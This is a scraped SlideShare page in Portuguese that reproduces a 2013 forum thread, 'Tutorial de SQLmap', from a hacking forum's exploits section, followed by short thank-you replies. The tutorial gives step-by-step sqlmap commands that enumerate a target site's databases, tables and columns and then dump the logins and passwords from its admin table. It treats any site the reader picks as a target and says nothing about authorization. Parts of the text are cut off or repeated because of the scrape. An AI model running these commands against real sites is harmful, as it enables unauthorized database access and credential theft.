Search...
OLÁ ROBMENDES Unread Replies
Fórum The Anony Bay » T.A.B SECURITY »
- Bugs & Exploits »
Tutorial de SQLmap
RESPO...
Fracos"
--tables é para descobrir as tabelas que tem dentro da database
O resultado será mais ou menos assim:
Código: [Sel...
Mensagens: 293
202 credits
View Inventory
Send Money To Pseudônimo
Agradecimentos 46
Reportar ao moderador Registrado
Re:T...
428 credits
View Inventory
Send Money To Whisper
Agradecimentos 2
Re:Tutorial de SQLmap
« Resposta #4 Online: 25-06-2013, ...
Próximos SlideShares
Carregando em…5
×

Tutorial de sq lmap

234 visualizações

Publicada em

0 comentários
0 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
234
No SlideShare
0
A partir de incorporações
0
Número de incorporações
1
Ações
Compartilhamentos
0
Downloads
3
Comentários
0
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Tutorial de sq lmap

  1. 1. Search... OLÁ ROBMENDES Unread Replies Fórum The Anony Bay » T.A.B SECURITY » - Bugs & Exploits » Tutorial de SQLmap RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1] Tutorial de SQLmap « Online: 19-04-2013, 03:23:58 » CitarXiranha! S.Administrador Membro Participativo Mensagens: 123 144 credits View Inventory Send Money To Xiranha! Agradecimentos 202 "O medo só existe na mente dos Curtir Seja o primeiro de seus amigos a curtir isso. Oque é SQLmap ? Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel. Para ver os comandos, basta digitar Código: [Selecionar] python sqlmap.py -h Estudo Após você ter o site que deseja explorar, digite Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 --dbs --dbs é para descobrir a(s) database(s) que contem no site O resultado será mais ou menos assim: Código: [Selecionar] [ * ] database_do_site<br />[ * ] information_schema Após descobrir a(s) data base(s), digite Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site --tables « tópico anterior tópico seguinte » Autor Tópico: Tutorial de SQLmap (Lida 108 vezes) Início AjudaAjuda BuscaBusca Editar PerfilEditar Perfil Minhas MensagensMinhas Mensagens Today's PostsToday's Posts ShopShop MembrosMembros SairSair TweetTweet 0 0
  2. 2. Fracos" --tables é para descobrir as tabelas que tem dentro da database O resultado será mais ou menos assim: Código: [Selecionar] +---------------+<br />| admin |<br />| publicidade |<br />| teste |<br />+---------- Após descobrir as tabelas, digite : Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin --columns --columns é para descobrir as colunas que tem dentro da tabela escolhida O resultado será mais ou menos assim : Código: [Selecionar] +--------+--------------+<br />| Column | Type |<br />+--------+--------------+<br />| ID | in Após descobrir as colunas, digite : Código: [Selecionar] python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin -C 'login,s --dump é para extrair os dados do site. mas não é qualquer dado, tem que estar dentro da coluna escolhida, e você tem que escolher o que extrair da coluna, no caso eu extrai os logins e senhas que estão salvo dentro da coluna De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da pasta /pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv Reportar ao moderador Registrado "não Clique" Re:Tutorial de SQLmap « Resposta #1 Online: 19-04-2013, 06:30:43 » CitarPseudônimo Administrador Membro Expert Curtir Seja o primeiro de seus amigos a curtir isso. Eita Rafa, obrigado pelo ótimo tutorial. Parabéns. TweetTweet 0 0
  3. 3. Mensagens: 293 202 credits View Inventory Send Money To Pseudônimo Agradecimentos 46 Reportar ao moderador Registrado Re:Tutorial de SQLmap « Resposta #2 Online: 28-04-2013, 14:30:36 » Citarpnp Novato Mensagens: 11 90 credits View Inventory Send Money To pnp Agradecimentos 0 Curtir Seja o primeiro de seus amigos a curtir isso. ótimo Tutorial. Reportar ao moderador Registrado Re:Tutorial de SQLmap « Resposta #3 Online: 25-06-2013, 00:10:53 » CitarWhisper Membro Participativo Mensagens: 66 Curtir Seja o primeiro de seus amigos a curtir isso. muito bom mesmo.. vlw.. Reportar ao moderador Registrado TweetTweet 0 0 TweetTweet 0 0
  4. 4. 428 credits View Inventory Send Money To Whisper Agradecimentos 2 Re:Tutorial de SQLmap « Resposta #4 Online: 25-06-2013, 09:42:40 » CitarTh3Jok3rG4m3r Na terra dos assassinos a mente de um pecador é santuário. Moderador Expert Membro Expert Mensagens: 340 2752 credits View Inventory Send Money To Th3Jok3rG4m3r Agradecimentos 65 É, Eu sou um tanto quanto ESTRANHO! Shhh Vá Dormir Curtir Seja o primeiro de seus amigos a curtir isso. Bem interessante Rafa, parabéns pelo tutorial Reportar ao moderador Registrado "Se RAP fosse coisa de bandido,muitos dos políticos seriam os MC's. ¯_(ツ)_/¯ " RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1] Fórum The Anony Bay » T.A.B SECURITY » - Bugs & Exploits » Tutorial de SQLmap Resposta Rápida « tópico anterior tópico seguinte » Ir para: => - Bugs & Exploits OK TweetTweet 0 0 SMF 2.0.4 | SMF © 2013, Simple Machines SMFAds for Free Forums Fórum The Anony Bay by Host By : TheHostBay

×